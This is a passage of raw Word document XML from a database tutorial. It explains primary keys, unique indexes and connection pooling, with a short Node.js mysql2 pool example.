      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use a primary key when you need to uniquely identify each row in the table. This is the column (or set of columns) that will be used in relationships with other tables (foreign keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE861B" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use a unique index when you need to ensure the uniqueness of values in a column that is not the primary key. For example, you might use a unique index on an email column to ensure no two users have the same email address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A27F8D" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA09C96" w14:textId="5D03F11A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc178383314"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is connection pooling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="17042472" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique used to manage and reuse database connections in an efficient manner, reducing the overhead associated with establishing new connections every time a database operation is performed. It is particularly important in environments where creating and closing database connections is resource-intensive and time-consuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F6DDCB" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Connection Pooling Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA766F2" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Pool Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A254693" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When the application starts, a pool of database connections is created and initialized. These connections are kept open and ready for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03116E7E" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Requesting a Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC87944" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When an application needs to perform a database operation, it requests a connection from the pool. If a connection is available, it is provided immediately without the need to establish a new connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE106F6" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reusing Connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4F35F" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Once the operation is complete, instead of closing the connection, it is returned to the pool and marked as available for future use. This allows the same connection to be reused multiple times, reducing the need for frequent connection creation and teardown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E893B7C" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Managing the Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBD1D3" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The pool can dynamically grow or shrink based on demand. If all connections in the pool are in use and a new connection is requested, the pool may create additional connections up to a specified maximum limit. If the demand decreases, idle connections can be closed to free up resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6D6AF7" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Connection Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD3B01" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD74D2" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduced Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Reusing existing connections eliminates the overhead of repeatedly establishing and tearing down connections, which can significantly reduce latency for database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103785DE" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient Resource Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By reusing connections, the application reduces the load on both the application server and the database server, leading to better overall performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D174681" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F886D3" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection pooling allows an application to handle more database requests concurrently without overwhelming the database server, as the pool limits the number of active connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19591CD4" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3B222" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The pool can manage connections by detecting and closing stale or broken connections, ensuring that the application always has healthy connections available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC56FE9" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Connection Pooling in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736301E7" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, connection pooling is often implemented using libraries such as node-postgres for PostgreSQL, mysql2 for MySQL, and mongoose for MongoDB. These libraries provide built-in support for connection pooling, making it easy to configure and use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384CE6F7" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example with MySQL in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7E897"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mysql = require('mysql2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32DDF7"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97A4942"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Create a connection pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135964FC"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pool = mysql.createPool({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6783E29F"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host: 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999EE1D"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user: 'root',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150AE25"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password: 'password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F359296"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database: 'example_db',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454579D4"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waitForConnections: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155FA53E"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connectionLimit: 10, // Maximum number of connections in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1152EC3B"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queueLimit: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D4975"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B37E5EC"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A7C4F18"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Use the pool to perform a query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF34D0C"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pool.query('SELECT * FROM users', (err, results) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF8C9E"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20225946"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console.log(results);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C79E08" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544"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5067D4F" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, a connection pool with a maximum of 10 connections is created. When a query is executed, the pool provides a connection from the pool if one is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450228D3" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for Connection Pooling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4FA6B" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimal Pool Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167DDEC" w14:textId="77777777" w:rsidR="00395544" w:rsidRPr="00DA2F32" w:rsidRDefault="00395544" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
